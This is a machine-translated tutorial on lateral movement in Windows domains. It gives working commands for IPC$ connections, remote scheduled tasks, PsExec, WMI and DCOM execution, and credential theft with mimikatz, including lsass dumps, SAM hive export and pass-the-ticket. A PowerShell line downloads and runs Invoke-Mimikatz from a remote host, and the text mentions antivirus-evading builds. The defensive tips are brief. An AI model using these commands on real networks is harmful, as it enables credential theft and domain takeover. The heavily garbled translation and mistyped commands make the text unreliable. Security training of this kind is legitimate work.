Intra domain lateral mobility is a technology widely used in complex intranet attacks , Especially in high-level persistent threats (Advanced Persistent Threats,APT in . An attacker can use this technology , Take the trapped system as a springboard , Access to other hosts in the domain , Expand the scope of assets （ Including documents in the springboard machine and stored credentials , And the database connected through the springboard machine 、 Domain controllers or other important assets ).
Through such attacks , An attacker may eventually gain access to the domain controller , Even complete control is based on Windows Operating system infrastructure and business-related key accounts . therefore , A strong password must be used to protect privileged users from lateral mobility attacks , So as to avoid the fall of other machines in the domain . It is recommended that the system administrator change the password regularly , This will invalidate the permissions obtained by the attacker .

common Windows Remote connection and related commands

In the penetration test , Get the user's clear text password of the target computer or NTLM Hash after , Can pass PTH (Pass the Hash, Credential transfer ） Methods , Pass the hash value or clear text password to the target machine for verification . After establishing the connection with the target machine , You can use related methods in remote Windows Execute commands in the operating system . When conducting penetration testing in a multi-layer agent environment , Due to poor network conditions , Unable to connect to remote host using graphical interface . here , You can use the command line to connect to the remote host ( Best use Windows The built-in method connects the remote target system on the command line ） And execute the relevant commands .
In the actual network environment , In this case , Network administrators can configure Windows The system has its own firewall or group policy for defense .

IPC

IPC( Internet Process Connection) share “ name pipes ” Resources for , Is an open named pipeline for inter process communication .IPC You can get the corresponding permissions by verifying the user name and password , It is usually used when remotely managing the computer and viewing the shared resources of the computer .
adopt ipc$, You can establish a connection with the target machine . Use this connection , Not only can you access files on the target machine , Upload 、 Download operation You can also run other commands on the day marking machine , To get the directory structure of the target machine 、 User list and other information .

 First , Need to build a ipc$   Enter the following command 
C:\Users\Administrator> net use \\1.1.1.10\ipc$ "123456Aa" /user:Administrator
 
 Then enter the command in the command line environment net use, View the current connection 
net use

1. ipc$ Utilization conditions of
(1） Open the 139、445 port
ipc$ It can realize remote login and access to the default shared resources , and 139 The opening of the port indicates NetBIOS Application of protocol . adopt 139、445 （Window 2000） port , It can realize the sharing of files / Printer access . therefore , In general ,ipc$ need 139、445 Port support .

(2） The administrator has enabled the default sharing
Default sharing is enabled by default to facilitate remote management by administrators , Including all logic disks （c$、d$、e$ etc. ） And system catalog winnt or windows(admin$). adopt ipc$, You can access these default shared directories .

2. ipc$ The reason why the connection failed

• Wrong user name or password .
• The target is not open ipc$ Default share .
• Failed to successfully connect to the target 139、445 port .
• Command input error .

3. Common error number

• Error number 5: Access denied .
• Error number 51: Windows Unable to find network path , That is, there are problems in the network
• Error number 53: No network path found , Include IP Wrong address 、 Target is not powered on , Target lanmanserver Service not started 、 The target has a firewall （ Port filtering ).
• Error number 67: No network name found , Include lanmanworkstation Service not started 、ipc$ have been deleted .
• Error number 1219: The supplied credentials conflict with an existing set of credentials . for example , Has been established with the goal ipc$, You need to reconnect after deleting the original connection .
• Error number 1326: Unknown user name or wrong password .
• Error number 1792: Trying to log in , But the network login server did not start , Include goals NetLogon Service not started （ This occurs when the domain controller is connected )
• Error number 2242: This user's password has expired . For example, the target machine has set the account management policy , Force users to change passwords regularly .

Use windows The built-in tool obtains the remote host information

1. dir command
In the use of net use The command establishes a connection with the remote target machine ipc$ after , have access to dir The command lists the files in the remote host

dir \\1.1.1.8\c$

2. tasklist command
In the use of net use The command establishes a connection with the remote target machine ipc$ after , have access to tasklist Ordered /S、/U、 /P Parameter lists the processes running on the remote host

tasklist /S 1.1.1.10 /U Administrator /P 123456Aa

Planning tasks

1. at command

at yes Windows Built in commands for creating scheduled tasks , It mainly works in Windows Sever 2008 In previous versions of the operating system . Use at The flow of the command to create a scheduled task on the remote target machine is roughly as follows .

1. Use net time The command determines the current system time of the remote machine .
2. Use copy The order will Payload Copy the file to the remote target machine .
3. Use at Command to start the timer Payload file .
4. Delete use at Command to create a record of a scheduled task .

In the use of at Command before creating a scheduled task on a remote machine , Need to use net use Command to establish ipc$.

（1） View target system time

net time The command can be used to view the system time of the remote host .
net time \\1.1.1.8

(2） Copy files to the target system
First , Create a... Locally calc.bat file , Its content is “calc”. then , Give Way Windows Run one “ Calculator “ Program , Use Windows Self contained copy Command to copy a file to the remote host C Plate . The order is as follows

copy calc.bat \\1.1.1.8\C$

(3） Use at Create a scheduled task
Use net time Command to get the system time of the current remote host . Use at Command causes the target system to run a program at a specified time

at \\1.1.1.10 4:10PM C:\calc.bat

(4） eliminate at Record
A scheduled task is not deleted as it is executed , therefore , The network administrator can know that the network has been attacked through the planned task created by the attacker .

at \\1.1.1.10 7 /delete    # Delete the created scheduled task 
 
 Use at After remote command execution , First write the execution result to the local text file , Reuse type Command to read the text file remotely .
at \\1.1.1.10 4:10PM cmd.exe /c "ipconfig" >C:/1.txt"
type \\1.1.1.10\C$\1.txt

2.schtasks command

Windows Vista、Windows Server 2008 And later versions of the operating system have been used schtasks Command instead of at command .

1. Create a remote host named “test” Our planning task . The scheduled task starts at boot time , The startup program is C On the plate  calc.bat, Start permission is System.
schtasks /create /s 1.1.1.10 /tn test /sc onstart /tr c:\calc.bat /ru system /f
 
2. Run on the remote host named test Scheduled tasks for 
schtasks /run /s 1.1.1.10 /i /rn "test"
 
3. In the use of schtasks You don't need to enter a password for the command , The reason is that the target machine has already been established ipc$. If not established ipc$, You can add parameters /u /p
/u administrator
/p "123456Aa"
/f  Mandatory deletion 
 
4. Delete scheduled task after task execution 
schtasks /delete /s 1.1.1.10 /tn "test" -f
 
5. Finally delete ipc$
net use  name  /del /y    # In the delete ipc$ when , Be sure to delete the self created ipc$

 In the use of schtasks On command , Log files will be left in the system C:\\Windows\Tasks\SchedLgU.txt. If you execute schtasks No echo after command , Can cooperate with ipc$ Executable files , Use type Command to view the execution result remotely .

In establishment IPC After connection , In addition to using planned tasks for indirect bounce Shell, You can also use PsExec Direct rebound Shell

PsExec Address ：https://download.sysinternals.com/files/PSTools.zip

Psexec.exe -accepteula \\192.168.7.107 -s cmd.exe

Windows System hash value acquisition analysis and prevention

LM Hash and NTLM Hash

Windowus The operating system usually uses two methods to encrypt the user's plaintext password . In a domain environment , User information is stored in ntds.dit in , After encryption, it is a hash value .Widows The password in the operating system usually consists of two parts , Part of it is LMHash, The other part is NTLMHash. stay Windows Operating system ,Hash The structure of is usually as follows .

username:RID:LM-HASH:NT-HASH

LM Hash The full name of is “LAN Manager Hash", It's Microsoft to improve Windows The hash encryption algorithm used in the security side of the operating system , Its essence is DES encryption . Even though LM Hash Easier to crack , But to ensure the compatibility of the system ,Windows Just to LMHash Disabled ( from Windows Vista and WindowsSever 2008 Version start ,Windows The operating system is disabled by default LM Hash ).LM Hash Plaintext passwords are limited to 14 Within position , in other words , If you want to stop using LM Hash, Set the user's password to 14 More than one bit is enough . If LM Hash Disabled , An attacker crawls through LM Hash Usually it is “ab35454a3435451404046“( Express LMHash Is null or disabled ).

NTLMHash It is a hash adder algorithm designed by Microsoft to improve security and ensure compatibility ,NTLMHash Is based on MD4 Encryption algorithm for encryption . Personal version from Windows Vista in the future , Server version from Wndows Sever2003 in the future ,Windows The authentication mode of the operating system is NTLM Hash.

Single machine password capture and prevention

If you want to be in Windows Grab hash value or plaintext password in the operating system , Permission must be elevated to System. Local user name 、 Hash values and other security verification information are stored in SAM In file .Isass.exe Processes are used to implement Windows Security policy ( Local security policy and login policy ). You can use tools to remove hash values and plaintext passwords from memory ls.exe A process or SAM Export from file .
stay Windows Operating system ,SAM The file is saved in C:\WindowslSystem32\config. The file is locked , Reproduction is not allowed . In the penetration test , Traditional methods can be used , Closing Windows After the operating system , Use PE Disk into file management environment , Direct copy SAM file , You can also use VSS And so on . The following is an analysis of common stand-alone password capture tools and methods , And give preventive suggestions .
1. GetPass
open GetPass Directory of tools . Open the command line environment .GetPassword _x64.exe. After running the program , You can get the clear text password

2. PwDump7
Run in the command line environment PwDump7 Program , You can get the information of all accounts in the system NTLM Hash, The hash value can be cracked through the rainbow table . If you can't crack it through the rainbow table , You can use the hash passing method to traverse the penetration test .

3. adopt SAM and System File capture password
(1) No tool export SAM file

reg save hklm\sam sam.hive    # adopt reg Of save Option will set the... In the registry SAM,System Export file to local disk 
reg save hklm\system system.hive

(2） By reading the SAM and System File acquisition NTML Hash

① Use mimikatz Read

lsadump::sam /sam:sam.hive /system:system.hive    # Exported files and mimikatz Put it in the same directory 

③ Use mimikatz Read the local data directly SAM file

 take mimikatz Upload to the target machine after the kill free processing , Open in command line mimikatz
privilege::debug    # Increase authority 
token::elevate    #system jurisdiction 
lsadump::sam    # Read local SAM file , obtain NTML Hash

4. Use mimikatz Read online SAM file

mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"    # Read hash value and inscription password online 

5. Use mimikatz Offline reading lsass.dmp file
（1） export lsass.dmp file

Use task manager to export lsass.dmp file .
stay Windows NT6 in , You can do it directly in the task manager Dump operation

(2) Use Procdump export lsass.dmp file .
Procdump It is an official tool released by Microsoft , You can set the target at the command line lsass File export , And anti-virus software will not intercept .

procdump.exe -accepteula -ma lsass.exe lsass.dmp

（3） Use mimikatz export lsass.dmp Password hash value in file

 function mimikatz, take lsass.dmp File loading to mimikatz
sekurlsa::minidump lsass.DMP    # notice Switch to MINIDUMP  Loading successful 
sekurlsa::logonPasswords full    # Export password hash value 

6. Use power shell The hash value is dump

 Administrator permission open powershell, Get into nishang Catalog , take Get-PassHashes.ps1 Script import 
Get-PassHashes

7. Use Powershell Remote load mimikatz Grab hash values and passwords

powershell IEX (New-Object Net WebClient).DownloadString('https://.../Invoke-Mimikatz.ps1');Invoke-Mimikatz` Insert a code chip here `

Use HashCat Get password

About hashcat The use of reference Hashcat Use

How to prevent attackers from grabbing plaintext passwords and hash values

1. Set up Active Diretory 2012 R2 Functional level
Windws Sever 2012R2 A new one called “ Protected users ” User group . Just put the users to be protected in this group , Attackers cannot use mimikaz And other tools grab plaintext passwords and hash values .

2. install KB2871997
KB2871997 Microsoft is used to solve PsExec or IPC Remote viewing (ipc$ ) Patch to the problem , It can make the local account no longer allowed to connect to the computer system remotely , But the default local administrator account Administrator This SID by 500 User exception for —— Even if Administrator Change of name , Of this account SID Still 500, Attackers can still use the horizontal attack method to gain control of other computers in the intranet . install KB2871997 after , You still need to disable the default Administrator account number , To protect against hash passing attacks .
In daily network maintenance , Can pass Windows update Make automatic updates , You can also visit Microsoft's official website to download patch files for repair .

3. Disable storing plaintext passwords in memory by modifying the registry
Microsoft is in Windows xp In the version, Tainan Jia has a name of WDigest The agreement . The agreement enables Windows Store the plaintext password in memory , To facilitate users to log in to the local computer .
Modify registry , Solve the problem of storing passwords in clear text in memory .

4. defense mimikatz attack
according to Debug Permissions determine which users can attach the debugger to any process or kernel . By default , This service is a local administrator Administrator all . But unless it's a system process , Local administrators rarely need to use this permission .
mimikatz When fetching hash values or plaintext passwords, you need to use Debug jurisdiction ( because mimikatz Need and Isass Processes interact , without Debug jurisdiction ,mimikatz Will not be able to read lsass process ). therefore , When maintaining the network , Defensive measures can be taken against this . Will have Debug Local administrators with permissions from Administrators Delete... From group . Restart the system , Run again mimikatz, Lose "privilege::debug", You will see an error message . here , It is no longer possible to use mimikatz Grab the hash value and plaintext password .

Hash delivery attack and prevention

Concept of hash delivery attack

Most penetration testers have heard of hash passing (Pass The Hash) attack . This method finds the hash value of the password related to the account ( Usually NTLM Hash ) To attack . In a domain environment , When users log in to the computer, they mostly use domain accounts , A large number of computers will use the same local administrator account and password during installation ,
therefore , If the local administrator account and password of the computer are the same , The attacker can log in to other computers in the intranet by using the method of hash passing attack . Pass by hash , Attackers do not need to spend time cracking password hashes ( And then get the password plaintext ).

stay Windows In the network , Hash values are used to prove identity ( Have correct username and password hash values , Can pass the verification ）, Microsoft's direct products and tools obviously do not support this attack , therefore , Attackers often use third-party tools to complete tasks . stay Windows server2012R2 And later versions of the operating system , By default, no clear text password will be recorded in memory , therefore , Attackers often use tools to pass hash values to other computers , Verify authority , Realize the control of remote computer .

analysis

Hash value ： When a user needs to log in to a website , If the website saves users' passwords in clear text , that , Once there is a security flaw in the website , The clear text passwords of all users will be disclosed . thus , The concept of hash value arises . When the user sets the password , The web server will hash and encrypt the user's password ( Usually use MD5 Algorithm ). Hash encryption algorithm is generally one-way irreversible algorithm . When a user logs on to a web site , The password entered by the user will be hashed and encrypted first , Then compare with the hash value stored in the database , If they are identical, the verification is successful .

Mainstream Windows operating system , You usually use NTLM Hash Authenticate users who access resources . Early versions of Windows operating system , Then use LM Hash Verify the user password . however , When the password is greater than or equal to 15 When a , Can't use LMHash 了 . from Windows Vista and Windows Server 2008 Version start ,Windows The operating system is disabled by default LM Hash, Because in use NTLM Hash When authenticating , Do not use clear text passwords , Instead, the plaintext password is passed through the system API ( for example LsaLogonUser ) Convert to hash value . however , After the attacker obtains the password hash value , Hash passing attacks can still be used to simulate user authentication

to update KB2871997 Patch

Microsoft is in 2014 year 5 Month issued KB2871997. This patch prohibits connecting to remote computers with local administrator privileges , The consequence is : Remote computers cannot be used by local administrators PsExec, WMI, smbexec, schtasks, You can't access the file share of the remote host . In the actual test , to update KB2871997 after ,Administrator account number (SID by 500 ) exception —— Hash transfer can still be performed using the hash value of this account .
What is emphasized here is SID by 500 Account number . In some computers , Even if Administator Change of name , It won't affect SID Value . therefore , If the attacker uses SID by 500 To move your account horizontally , Would not have been K827197 Influence . This should be paid special attention to in actual network maintenance

Analysis and prevention of bill delivery attack

Want to use mimikatz Hash transfer function of , Must have local administrator privileges .mimikatz It also provides a method for horizontal penetration testing without local administrator privileges , For example, bill transfer ( Pass The Ticket, PTT). This section will analyze the idea of ticket delivery attack through experiments , And give preventive measures .

Use mimikatz Bill delivery

mimikatz "privilege::debug" "sekurlsa::tickets /export"    # Use mimikatz, You can export tickets in memory 

After executing the above order , The ticket files of multiple services will appear in the current directory , for example krbgt、cifs、ldap etc. .

kerberos::purge    # Use minikata Clear the ticket in memory 

mimikatz "kerberos::ptt "C:\Users\Administrator\Desktop\[0;3e4]-0-0-40a50000-WIN-2008[email protected]GC-WIN-2012.hello.testlab.kirbi"    # Inject the ticket file into memory 
 After the ticket file with high permission is injected into memory , The file directories of the remote computer system are listed 
dir \\WIN-2008\c$

Use kekeo Bill delivery

Bill transfer can also use kekeo. You need to use a domain name 、 user name 、NLMHash The three cooperate to generate bills , Then import the bill into , To connect directly to the remote computer

How to prevent bill delivery attacks

How to prevent bill delivery attacks

• Use dir On command , Be sure to use the hostname . If you use IP Address , It will lead to mistakes .
• The default effective time of note file in memory is 10 Hours .
• The ticket can be delivered on the target machine without the permission of the local administrator .
• Through the above points , You can sort out the idea of defending against bill delivery attacks .

PsExec

PsExec yes SysInternals A powerful software in the suite . At first PsExec It is mainly used for mass production Windows Operation and maintenance of the host , The effect is especially good in the domain environment . however , Attackers are beginning to use PsExec, Connect to the target machine through the command line environment , Even control the target machine , Without using the remote desktop protocol ( RDP ) Perform graphical control , It reduces the possibility of malicious operations being discovered by the administrator ( because PsExec yes Windows Tools provided , So antivirus software puts it on the white list ).PsExec Can be in Windows Vista/NT 4.0/2000/XP/Server 2003/Server 2008/Server 2012/Server 2016( Include 64 Bit version ) Up operation .

PsTools In the kit PsExec

PsExec Included in PsTools In the toolkit . adopt PsExec. You can execute commands on a remote computer , You can also elevate administrator privileges to System Permission to run the specified program .PsExec The basic principle of : Create a... On the remote target machine through a pipe psexec service , And generate... On the local disk - A group called “PSEXESVC" Binary file , then , adopt psexec Service run command , Delete the service after running .
First , Need to get interactive information about the target operating system Shell In establishing the ipc$ Under the circumstances , Execute the following order , obtain System The powers of the Shell

Msf Medium psexec modular

Metasploit The plug-in for is to use Ruby language-written , Penetration testers can write their own plug-ins and integrate them into Metasploit In the frame . Network maintenance personnel can use this tool to detect the machines in the managed network , Find and deal with relevant problems in time , Improve overall business security .

WMI Use

WMI Use
WMI The full name of is “ Windows Management Instrumentation". from Windows 98 Start ,Windows All systems support WMI.WMI It's a set of tools , Computer systems can be managed locally or remotely .
since PsExec After being strictly monitored in the intranet , More and more anti-virus vendors will PsExec Added to the blacklist , have access to WMI Move horizontally . Through penetration test, it is found that , In the use of wmi.exe When moving laterally ,Windows By default, the operating system will not WMI The operation of is recorded in the log . Because no log will be generated during this process , Therefore, it increases the cost of attack traceability for network administrators . For the attacker , The probability of being observed is reduced 、 The concealment and salvation have been improved .

Basic commands

wmic /node:1.1.1.10 /user:Administrator /password:123456Aa process call create "cmd.exe /c ipconfig >c:\ip.txt"    # Use the... Of the target system cmd.exe Execute a command , Save the execution results in C Plate 

establish ipc after , Use type The command reads the execution result

net use \\1.1.1.8\ipc$ "123456Aa" /user:Administrator
type \\1.1.1.8\C$\ip.txt

Next , Use wmic Remote execution command , Start in the remote system Windows Management Instrumentation service ( The target server needs to be open 135 port ,wmic The command will be executed in the remote system with administrator privileges ）. If the target server has a firewall turned on ,wmic You will not be able to connect .
Besides ,wmic No echo , Need to use ipc$ and type Command to read information . It should be noted that , If wmic Executing a malicious program , There will be no log .

impacket In the kit wmiexec

stay KaiLi Download and install impacket tool kit . Pictured 5-74 Shown , Enter the following command , Get the target shell, This method is mainly used from Linux towards Windows For transverse penetration tests .

wmiexec.vbs

wmiexec.vbs The script by VBS call WMI To simulate the PsExec The function of .wniexec. vbs Commands can be executed and echoed in the remote system , Get a semi interactive remote host Shel

Invoke-WmiCommand

Invoke-WmiCommand.ps1 The script is included in PowerSploit In the toolkit . The script mainly passes through PowerShell call WMI To execute commands remotely , So in essence, it is still using WMI.

Invoke-WMIMethod

utilize PowerShell Self contained Invoke-WMIMethod, You can execute commands and specify programs in a remote system . stay PowerShell Execute the following commands in the command line environment , Commands can be executed in a non interactive manner , But it does not echo

Analysis and prevention of eternal blue

The vulnerability passes to Windows Server's SMBv1 The service sends a crafted command, causing an overflow , It eventually leads to the execution of arbitrary commands . stay Windows Operating system , SMB The service is on by default , The listening port defaults to
by 445, Therefore, the impact of this vulnerability is great . The operating systems affected by this vulnerability are Windows NT、Windows 2000、Windows XP、Windows Server 2003、Windows Vista、Windows 7、Windows 8、Windows Server2008、Windows Server 2008 R2、Windows Server 2012R2 etc. . The new version of the Mtsploit It's integrated MS17-010 Vulnerability test module .

defense “ Eternal Blue ” Loophole pair Windows Operating system attacks , The method is as follows .

• Ban SMB agreement ( The method is applicable to Windows Vista And higher operating systems ).
• open Windows Update, Or install it by hand KB2919355.
• Use a firewall to block 445 Port connection , Or use the / Outbound rules prevent 445 Port connection .
• Don't open strange files at will .
• anti-virus software , Update the virus database in time .

smbexec Use

smbexe You can use file sharing (admins cs、ipes. d$) Execute commands in a remote system

c++ edition smbexec

impacket In the kit smbexec.py

linux Span Windows Remote execution command

DCOM Use in remote systems

DCOM ( Distributed Component Object Model ) Is a series of Microsoft concepts and program interfaces . adopt DCOM, The client program object can send requests to the server program object on another computer in the network .
DCOM Is based on the component object model (COM) Of .COM It provides a set of interfaces that allow communication between clients and servers on the same computer ( Running on the Windows95 And later versions of the operating system ).
When an attacker moves sideways , If you want to execute a command or... On a remote system payload, In addition to using the previous at、schtasks、 PsExee、 WMI、smbexec 、PowerShell etc. , It also uses a large number of devices deployed in the network environment, such as IPS、 Flow analysis and other systems . Learn more about lateral movement methods , It is of great benefit to the daily system security maintenance .

Via local DCOM Carry out orders

1. obtain DCOM Program list
Get-ClimInstance This cmdlet (PowerShel Command line ) Default only in PowerShell3.0 In the above version . in other words , Only Windows Sever 2012 And above versions of the operating system can be used Get-ClimInstance. Orders such as

Get-CimInstance win32_DCOMApplication

because Windows 7、Windows Server 2008 The default installation in is Powershell 2.0, So they don't support Get-Cimlnstance Instead of Get-CimInstance
Start a local with administrator privileges PowerShell, Execute the following command

Get-WmiObject -Namespace ROOT\cimv2 -Class Win32_DCOMApplication

2. Use DCOM Execute arbitrary orders

Start a local with administrator privileges powershell

$com = 
{activator}::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","127.0.0.1"))
 
$com.Document.ActiveView.ExecuteShellCommand('cmd.exe',$null,"/c calc.exe","Minimzed")

completion of enforcement , The grid executes in the current session Administrator The powers of the clac

The method is passed by ExecuteShellCommand It's running “ Calculator ” Program .

Use DCOM Execute commands on remote machines

When using this method , The system firewall needs to be turned off . When executing a command on a remote machine , You must use an account with local administrator privileges .
1. adopt ipc$ Connect to a remote computer
2. Carry out orders

SPN Application in domain environment

Windows The domain environment is based on Microsoft's active directory service , It disperses the physical location in the network system environment 、 Users from different departments are grouped , Centralize resources , Effectively allocate resource access control permissions in a fine-grained manner , It improves the security of network environment and the convenience of unified distribution and management of network resources . In the domain environment
A large number of applications running in contain a variety of resources , For rational grouping of resources 、 Classification and redistribution facilitate . Microsoft assigns different service principal names to each resource in the domain (Service Principal Name,SPN).

SPN scanning

1. Relevant concepts

In the use of Kerberos Protocol for authentication in the network , You must have a built-in account (NetworkService、 LocalSystem) Or register for the server under the user account SPN. For built-in accounts ,SPN Will automatically register . But Gago runs the service under the domain user account , You must register manually for the account you want to use SPN. Because every server in the domain environment needs to be in Kerberos The identity check-up service is in progress SPN, Therefore, the attacker will send query requests directly to the domain controller , Get the services they need SPN, So as to know the service resources they need to use on that machine .
Kerberos The identity verification is convenient SPN Associate the service instance with the service login account . If more than one service instance is installed on the computer in the domain , Then each instance must have its own SPN. If the client may use multiple names for authentication , Then a given service instance can have multiple SPN. for example ,SPN Always include the host name of the running service instance , therefore , A service instance can register one for each name or alias of its host SPN. according to Kerberos agreement , When you enter your account and password to log in to the active directory , The domain controller will verify the account and password . After the verification is passed , Key distribution center （KDC) Services such as bills will be authorized (TGT) Send to user （ As the user's identity credentials when accessing resources ）.

Here is an example . When users need to access MSSQL The service , The system will query the domain controller as the current user SPN by “MSSQL” The record of . To find the SPN After recording , The user will contact again KDC signal communication , take KDC Issued TGT Send as identity credentials to KDC, And will need to access SPN Send to KDC.KDC Authentication service in (AS) Yes TGT To decrypt . After confirmation , from TGT A run will access the SPN The bill of the corresponding service and the SPN The address of the corresponding service is sent to the user . This ticket enables users to access MSSQL service .
SPN The order is as follows

SPN = serviceclass "/" hostname [":"port"] ["/" servicename]
serviceclass: The name of the service component 
hostname: With “/” Separate from the name behind , It's computer FQDN Fully qualified domain name , With both computer name and domain name 
port: Divide by colons , The following content is the port number that the service listens to 
servicename: A string , It can be the proper name of the service （DN),objeectGuid,Internet Host name or fully qualified domain name 

2. common SPN service

MSSQL  The sample code for the service is as follows .
MSSQLSvc/ computer1.labtest.com:1433
MSSOLSvc:  The name of the service component , Here is  MSSQL  service .
computer computer1.labtest: The host name is computer1, The domain name is labtest
1433: The listening port is 1433.
serviceclass and  hostname Is a required parameter ,port and servicename Is an optional parameter ,hostname and port The colon between is only used when the service listens on its port .
 
 
Exchange The sample code for the service is as follows .
exchangeMDB/EXCAS01.labtest.com
 
RDP The sample code for the service is as follows .
TERMSERV/EXCAS01.labtest.com
 
WSMan/WinRM/PSRemoting  The sample code for the service is as follows .
WSMAN/EXCAS01.labtest.com

3. Used for SPN Scanned PowerShell Script

When a computer joins a domain , Lord SPN Will be automatically added to the computer account added to the domain ServicePrincipalName Properties of the . After installing the new service ,SPN It will also be recorded in the corresponding attributes of the computer account .
SPN Scanning is also called “ scanning Kerberos Service instance name ”. The best way to find services in the active directory is SPN scanning .SPN Scan by requesting specific SPN Type to find the service . Compared with network port scanning ,SPN The main feature of scanning is that there is no need to connect every part of the network IP Address to check the service port （ It will not trigger... In the intranet IPS,IDS And other equipment rules to generate a large number of alarm logs ）. because SPN Query is Kerberos Part of the bill act , Therefore, it is difficult to detect .

Pelhel-AD-Rccon The toolkit provides a series of corresponding relationships between services and service login accounts and hosts running services , These services include but are not limited to MSSQL

Kerberoast Attack analysis and prevention

Kerberoast It's a kind of needle Yes Kerberos Protocol attack mode . In order to use a particular resource TGS send out Kerberos Service ticket request , Users first need to use a with valid identity permissions TGT towards TGS Request the ticket for the corresponding service . When TGT When it is verified to be valid and has the permission of the service , A ticket will be sent to the user . This note is used in conjunction with SPN Of the associated computer service account NTLM Hash (RC4_HMAC_MD5), in other words , The attacker will pass Kerberoast Try using different NTLM Hash To open the Kerberos Notes . If the attacker uses NTLM Hash That's right. ,Kerbers The ticket will be opened , And the NTLM Hash The password corresponding to the computer service account .
In a domain environment , The attacker will pass Kerberast Use normal user permissions to extract the credentials of the computer service account in the active directory . Because when using this method , Most operations are done offline , No information will be sent to the target system , Therefore, it will not cause the alarm of safety equipment . And because the domain environment policy of most networks is not strict enough ( No password expiration time is set for the computer service account ; The permissions of the computer service account are too high ; The password of the computer service account is the same as that of the common domain user account ）, So the password of the computer service account is easy to be Kerberoast The impact of the attack .

Precautions
in the light of Kerberoast attack , There are the following precautions .

• Ensure that the service account password is longer than 25 position ; Ensure the randomness of the password ; Regularly change the password of the service account .
• If , No attacker will be able to default AES256_HMAC The encryption method is changed to RC4_HMAC_MD5, Can't use tgsrepcrack.py To crack the code .
• Attackers can sniff and grab Kerberos TGS Notes . therefore , If forced to use AES_256_HMAC Way to Kerberos The bill is encrypted , that , Even if the attacker gets Kerberos Notes , You can't crack it , This ensures the security of the active directory .
• Many service accounts have been assigned excessive permissions in the intranet , And the password strength is usually poor . The attacker is likely to crack the ticket's password , Upgrade from domain user privilege to domain administrator privilege . therefore , The permissions of the service account should be configured properly , And increase the strength of the password .
• During log auditing , You can focus on ID by 4769 ( request Krbers Service ticket ) Events . If there are too many 4769 journal , You should further check the system for malicious behavior .

Exchange Mail server security

Exdhane Is an email service component from Microsoft , Is a messaging and collaboration system .Exchange It is often used as the main e-mail system in schools and enterprises .Exchange The main versions of are Exchange 2003、Exchange 2007、Exchange 2010、Exchange 2013、Exchange 2016、Exchange 2019.
Exchange Servers can be deployed in localized form . You can also use Exchange Online The way , take Exchange The server is hosted in Microsoft cloud .Exchange Provides strong scalability 、 reliability 、 Usability , And extremely high processing performance and safety performance . meanwhile ,Exchange And Active Directory 、 Domain services 、 There is a close connection between the global catalog and other Microsoft related services and components .
In large enterprises , Most office work is done through the e-mail system , Email may contain a lot of source code 、 Enterprise internal address book 、 Plaintext password , Login addresses of sensitive services and those that can access the intranet from the external network VPN Account, password and other information . therefore . During security negotiation on the server , It must be updated in time Exchange Software security patches and Exchange Security patch for the server , Effectively reduce Echage The probability of enemy occupation .Exchange Support PowerShell Operate it locally or remotely , This aspect facilitates the operation and maintenance personnel to Exchange Management and configuration of , On the other hand, for the attacker to Exchange Malicious operations create conditions .

Introduce

1. Introduction to the role of mail server

By dividing different server roles ( Enable them to execute their own components and services ), And setting dependencies for these roles ,Exchange Turn email processing into a powerful 、 Enrich 、 A stable and complex process .Exchange It is logically divided into three layers , The network layer Network Layer)、 Directory layer ( DretoryLayer). Message layer (MessgingLayer). The server role is in the message layer .
With Exchange Server 2010 Version as an example , There are five server roles , They are mailbox servers 、 Client access server 、 Hub transmission server 、 Unified messaging server 、 Edge Transport server . All other roles can be deployed on the same host . Mail server , Client access server , The Hub Transport server is the core server role , As long as you deploy these three roles, you can provide basic e-mail processing functions .

• Mailbox server ( Milbox Sver): Provide managed mailbox 、 Public folders and related message data ( For example, address list ) The backend component of is a required server role .
• Client access server (Cient Acess Sever): The server role that receives and processes requests from different clients , Support for access through different protocols . In a Exchang Environment , At least one client access server needs to be deployed .
• Hub transmission server (Hub Transport Server ): Also known as central transport server . The core service of the server role is Microsoft Exchange Transport, Responsible for handling Mail Flow ( Exchange Administrator through Mail Flow Implement outbound and inbound mail configuration )、 Route mail and send it to Exchange Distribution in the organization . This server role handles all messages sent to local mailboxes and external mailboxes , Ensure that the addresses of the sender and receiver of the mail are correctly resolved and that specific policies can be implemented ( For example, email address filtering 、 Content filtering 、 Format conversion, etc ), meanwhile , Can be recorded 、 Audit 、 Add disclaimer and other operations . just as “Hub Transport” The meaning of , The server role is equivalent to - A relay station for mail transmission . In a Exchange Environment , At least one hub needs to be deployed Transport server .
• Unified messaging server (Unified Messaging Server ): Connect the private exchange ( Private Branch Exchange,PBX) and Exchange Servers are integrated , Allow users to send... By mail 、 Store voice and fax messages . The server role is optional . Edge Transport server ( Edge Transport Server): Dedicated server , Can be used to route mail to internal or external , It is usually deployed at the network boundary and used to set the security boundary . This server role receives messages from internal organizations and external trusted servers , Apply specific anti spam to these messages 、 Anti virus strategy , Route the messages filtered by policy to the internal Hub Transport server . The server role is optional .

2. client / Remote access interfaces and protocols

E-mail communication is generally divided into two processes: e-mail sending and e-mail receiving . Mail sending uses a unified communication protocol , namely SMTP ( Simple mail transfer protocol ). Mail reception will use a variety of protocol standards , For example, from POP ( Post office protocol ) Developed from POP3, And widely used IMAP (Intemnet Email access protocol ).Exchange Developed private IMAP agreement ( For receiving mail ). The new version of the Outlook Usually make MAPI Deal with the Exchange Interact . besides , In the early Outlook Use the name “Outlook Anywhere" Of RPC Interact .
Exchange The supported access interfaces and protocols are listed below .

• OWA Oulook WebApp): Exchange Provided Web mailbox
• EAC (Exchange Administrative Center): Exchange Management Center , It's in the organization Exchange Of Web Console
• Outlook Anywhere ( RPC-over-HTTP, RPC/HTTP ).
• MAPI (MAPI-over-HTTP, MAPIHTTP ).
• Exchange ActiveSync (EAS, XML/HTTP).
• Exchange Web Services(EWS,SOAP-over-HTTP)

Exchange Service discovery

1. Send based on port scanning
Exchange As a running in a computer system 、 Applications that provide services to users , The corresponding port must be opened ( For multiple services and functional components to achieve interdependence and coordination ). therefore , Through port scanning, you can find the open... In the intranet or public network Exchange The server .
Because the specific open port or service depends on the server role , In the experiment in this section , Use Nmap Port scan , And confirm the result by scanning

nmap -A -0 -sV 192. 168.168.0.100

Use Nmap Port scanning method to find Exchange The server , Need to interact with the host , Generate a lot of traffic , cause IDS Call the police , And leave a large number of logs in the target server . therefore , Pay attention to the alarm information 、 Check the log frequently , You can find the exceptions in the network system .

2. SPN Inquire about
In the installation Exchange when ,SPN It is registered in the active directory . In a domain environment , Can pass SPN To discover Exchange service . obtain SPN There are many ways to record , have access to PowerShell Script get , You can also use Windows Self contained setspn.exe obtain . Enter the following command and execute

